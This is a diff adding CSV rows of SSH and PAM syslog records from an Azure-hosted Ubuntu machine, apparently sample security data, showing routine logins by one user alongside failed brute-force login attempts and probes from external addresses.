+7638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:04:08,UbuntuDevEnv,2019-06-11 19:04:07,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 5587 ssh2,40058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,5587,,
+7639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:04:09,UbuntuDevEnv,2019-06-11 19:04:09,auth,UbuntuDevEnv,info,Received signal 15  terminating.,46149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:47:25,UbuntuDevEnv,2019-06-17 15:47:24,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.147.181 port 43289 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,4382,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.147.1,43289,,
+7641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:47:25,UbuntuDevEnv,2019-06-17 15:47:24,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),4382,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+7642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:47:25,UbuntuDevEnv,2019-06-17 15:47:24,auth,UbuntuDevEnv,info,New session 7 of user peteb.,1248,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+7643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:47:25,UbuntuDevEnv,2019-06-17 15:47:24,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+7644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:47:26,UbuntuDevEnv,2019-06-17 15:47:26,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),4500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+7645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:47:26,UbuntuDevEnv,2019-06-17 15:47:26,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.147.181 port 32879 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,4500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.147.1,32879,,
+7646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:47:26,UbuntuDevEnv,2019-06-17 15:47:26,auth,UbuntuDevEnv,info,New session 9 of user peteb.,1248,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+7647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:52:03,UbuntuDevEnv,2019-06-17 15:52:02,auth,UbuntuDevEnv,info,Received signal 15  terminating.,1423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:52:03,UbuntuDevEnv,2019-06-17 15:52:02,auth,UbuntuDevEnv,info,Server listening on :: port 22.,9367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,22,,
+7649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:52:03,UbuntuDevEnv,2019-06-17 15:52:02,auth,UbuntuDevEnv,info,Server listening on 0.0.0.0 port 22.,9367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,0.0.0.0,22,,
+7650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:52:13,UbuntuDevEnv,2019-06-17 15:52:13,auth,UbuntuDevEnv,info,Watching system buttons on /dev/input/event0 (Power Button),1248,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:52:13,UbuntuDevEnv,2019-06-17 15:52:13,auth,UbuntuDevEnv,info,Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard),1248,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 15:52:13,UbuntuDevEnv,2019-06-17 15:52:13,auth,UbuntuDevEnv,info,Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard),1248,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 16:03:53,UbuntuDevEnv,2019-06-17 16:03:53,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,4382,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+7654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 16:03:53,UbuntuDevEnv,2019-06-17 16:03:53,auth,UbuntuDevEnv,info,Removed session 7.,1248,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 16:03:54,UbuntuDevEnv,2019-06-17 16:03:53,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,4500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+7656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-17 16:03:54,UbuntuDevEnv,2019-06-17 16:03:53,auth,UbuntuDevEnv,info,Removed session 9.,1248,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:35,UbuntuDevEnv,2019-06-07 23:28:34,auth,UbuntuDevEnv,info,Connection closed by authenticating user badstuff 104.210.58.65 port 49196 [preauth],18538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,badstuff,104.210.58.6,49196,,authenticating
+7658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:35,UbuntuDevEnv,2019-06-07 23:28:34,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 116.234.164.42 port 46839 ssh2],18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,116.234.164.4,46839,,
+7659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:37,UbuntuDevEnv,2019-06-07 23:28:36,auth,UbuntuDevEnv,info,Failed password for root from 116.234.164.42 port 46839 ssh2,18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,116.234.164.4,46839,,
+7660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:39,UbuntuDevEnv,2019-06-07 23:28:39,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 116.234.164.42 port 46839: Too many authentication failures [preauth],18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,116.234.164.4,46839,,
+7661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:39,UbuntuDevEnv,2019-06-07 23:28:39,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=116.234.164.42  user=root,18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,116.234.164.4,,0,
+7662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:39,UbuntuDevEnv,2019-06-07 23:28:39,auth,UbuntuDevEnv,info,Failed password for root from 116.234.164.42 port 46839 ssh2,18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,116.234.164.4,46839,,
+7663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:39,UbuntuDevEnv,2019-06-07 23:28:39,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 116.234.164.42 port 46839 ssh2 [preauth],18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,116.234.164.4,46839,,
+7664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:39,UbuntuDevEnv,2019-06-07 23:28:39,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-08 00:23:25,UbuntuDevEnv,2019-06-08 00:23:25,auth,UbuntuDevEnv,info,Disconnected from 159.65.145.206 port 51042 [preauth],24528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.145.2,51042,,
+7666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-08 00:23:25,UbuntuDevEnv,2019-06-08 00:23:25,auth,UbuntuDevEnv,info,Received disconnect from 159.65.145.206 port 51042:11: Bye Bye [preauth],24528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.145.2,51042,,
+7667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 10:41:26,UbuntuDevEnv,2019-06-11 10:41:26,auth,UbuntuDevEnv,info,Connection closed by 116.238.37.194 port 54061 [preauth],59028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,116.238.37.1,54061,,
+7668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 10:44:07,UbuntuDevEnv,2019-06-11 10:44:07,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.89 port 59926,59645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.8,59926,,
+7669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 10:44:07,UbuntuDevEnv,2019-06-11 10:44:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.32.163.89,59645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.32.163.8,,0,
+7670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 10:44:07,UbuntuDevEnv,2019-06-11 10:44:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 10:44:09,UbuntuDevEnv,2019-06-11 10:44:09,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.32.163.89 port 59926 ssh2,59645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.8,59926,,
+7672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 10:44:22,UbuntuDevEnv,2019-06-11 10:44:21,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.89 port 59926: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",59645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.8,59926,,
+7673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:38:20,UbuntuDevEnv,2019-06-11 12:38:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 40120,85009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,40120,,
+7674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:39:20,UbuntuDevEnv,2019-06-11 12:39:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 42584,85219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,42584,,
+7675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:40:20,UbuntuDevEnv,2019-06-11 12:40:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 44097,85432,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,44097,,
+7676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:41:20,UbuntuDevEnv,2019-06-11 12:41:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 46469,85647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,46469,,
+7677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:42:20,UbuntuDevEnv,2019-06-11 12:42:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 47898,85857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,47898,,
+7678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:43:20,UbuntuDevEnv,2019-06-11 12:43:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 50578,86067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,50578,,
+7679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:43:53,UbuntuDevEnv,2019-06-11 12:43:53,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 51482,86189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,51482,,
+7680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:43:53,UbuntuDevEnv,2019-06-11 12:43:53,auth,UbuntuDevEnv,info,"Unable to negotiate with 89.101.149.137 port 51496: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 [preauth]",86190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,51496,,
+7681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:44:20,UbuntuDevEnv,2019-06-11 12:44:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 52191,86281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,52191,,
+7682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:45:20,UbuntuDevEnv,2019-06-11 12:45:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 53879,86525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,53879,,
+7683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:46:20,UbuntuDevEnv,2019-06-11 12:46:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 56731,86801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,56731,,
+7684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:46:27,UbuntuDevEnv,2019-06-11 12:46:26,auth,UbuntuDevEnv,info,Disconnected from 159.65.145.206 port 43818 [preauth],86822,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.145.2,43818,,
+7685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:46:27,UbuntuDevEnv,2019-06-11 12:46:26,auth,UbuntuDevEnv,info,Received disconnect from 159.65.145.206 port 43818:11: Bye Bye [preauth],86822,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.145.2,43818,,
+7686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:47:20,UbuntuDevEnv,2019-06-11 12:47:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 59061,87019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,59061,,
+7687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:47:20,UbuntuDevEnv,2019-06-11 12:47:20,auth,UbuntuDevEnv,info,Did not receive identification string from 107.170.203.249 port 44620,86994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.170.203.2,44620,,
+7688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:48:20,UbuntuDevEnv,2019-06-11 12:48:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 60970,87229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,60970,,
+7689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:49:20,UbuntuDevEnv,2019-06-11 12:49:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 63640,87440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,63640,,
+7690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:50:20,UbuntuDevEnv,2019-06-11 12:50:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 61525,87653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,61525,,
+7691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:51:20,UbuntuDevEnv,2019-06-11 12:51:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 63346,87873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,63346,,
+7692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:54:20,UbuntuDevEnv,2019-06-11 12:54:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 10573,88513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,10573,,
+7693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:55:20,UbuntuDevEnv,2019-06-11 12:55:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 12384,88726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,12384,,
+7694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:56:20,UbuntuDevEnv,2019-06-11 12:56:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 13877,88937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,13877,,
+7695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:57:20,UbuntuDevEnv,2019-06-11 12:57:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 15668,89147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,15668,,
+7696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:00:20,UbuntuDevEnv,2019-06-11 13:00:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 19719,89813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,19719,,
+7697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:00:59,UbuntuDevEnv,2019-06-11 13:00:59,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20457,90013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20457,,
+7698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:00,UbuntuDevEnv,2019-06-11 13:00:59,auth,UbuntuDevEnv,info,Invalid user admin from 89.101.149.137 port 20465,90014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,89.101.149.1,20465,,
